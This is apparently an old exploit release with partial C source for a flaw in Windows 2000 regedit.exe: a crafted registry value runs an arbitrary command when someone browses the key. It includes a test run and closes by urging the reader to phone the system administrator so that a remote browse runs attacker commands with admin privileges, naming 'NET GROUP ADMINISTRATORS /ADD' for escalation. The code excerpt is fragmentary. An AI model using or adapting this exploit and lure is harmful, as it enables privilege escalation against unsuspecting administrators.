~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is a
NEW exploit for a NEW vulnerability in REGEDIT.EXE !
This
one trap a KEY in the registery, that when a non informed user just
try to BROWSE IT with REGEDIT.EXE (localy or REMOTELY !) execute an
arbitrary command defined by attacker without its knowledge !
The vulnerabitily appear to be in a RegEnumValueW function
misused in regedit.exe
By precaution, I council to use
regedt32.exe for your future registery manipulation.
This
exploit as been tested on Win2K (fr) SP0,2,3, and work with a local
and remote browse of a trapped registery.
for (indice=0; HandleKey[indice].RK; indice++)
if (!lstrcmpi (HandleKey[indice].KeyName,ROOTKEY))
return HandleKey[indice].RK;
printf ("'%s'
is an unknow RootKey! You can only work with the following
:\n" "- HKEY_CLASSES_ROOT\n" "-
HKEY_CURRENT_USER\n" "- HKEY_LOCAL_MACHINE\n"
"- HKEY_USERS\n",ROOTKEY);
if (argc > 2) { i = lstrlen
(argv[2]); if ( !(YourKey = LocalAlloc (LPTR,i+2)) )
{ printf ("Cannot allocat memory for
store the name of key to trap !\n"); ExitProcess
(0); }
lstrcpyn (YourKey,argv[2],i+1);
if (p = strchr (YourKey, 0x5C))
p[0]=0x00; }
ret = RegOpenKeyEx (YourKey ?
RootHandle (YourKey) : RootHandle (DefaultKey), p ?
++p : "", 0 , KEY_ALL_ACCESS, &TrapedKey);
if (ret != ERROR_SUCCESS) { printf
("Cannot open '%s' for trap it !\n" "See error code
number %u for more details.\n", YourKey ?
argv[2] : DefaultKey , ret); ExitProcess (0); }
ret = RegSetValueExW (TrapedKey,(const unsigned
short *)VulnBuff,0,REG_SZ,(CONST BYTE *)&Data,mastar);
if (ret == ERROR_SUCCESS) { printf
("'%s' is now trapped for execute '%s' " "when our
favourite administrator will browse it whith REGEDIT.EXE
:p\n", YourKey ? argv[2] : DefaultKey , argv[1]);
} else printf ("Cannot write evil value to trap the
registery !\n" "See error code number %u for
more details.\n",ret);
a simple methode for test if your
system is vulnerable to the 'Trapped Registery for REGEDIT.EXE
exploit' !
after a succesfull compilation of the xploit,
type the following command on a cmd prompt shell :
--
D:\code\exploits>TrapReg.exe "cmd /c echo WARRNING! you are
vulnerable to the Trapped Registery for REGEDIT.EXE exploit!
> c:\a.txt & c:\a.txt" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
########################################### Trapped
Registery for REGEDIT.EXE exploit !
########################################### Discovered &
coded by ThreaT.
'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft'
is now trapped for execute 'cmd /c echo WARRNING! you are
vulnerable to the Trapped Registery for REGEDIT.EXE exploit! >
c:\a.txt & c:\a.txt' when our favourite administrator will
browse it whith REGEDIT.EXE :p
D:\code\exploits> --
Ok, everything seen to be good ! now, launch
REGEDIT.exe and go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft.
If notepad (or your favourite text editor) appear with the
sentence : "WARRNING! you are vulnerable to the Trapped
Registery for REGEDIT.EXE exploit!"
use regedt32.exe until
Microsoft release a patch for regedit.exe :)
For more fun,
you can phone call your system administrator, and say him you have a
problem with your registery at this specific key.
When he
will try to browse it remotely with regedit.exe, our arbitrary
command will be executed to his computer with his privilege !
So, nobody prevent you to trap your registery with a 'NET
GROUP ADMINISTRATORS /ADD' :))
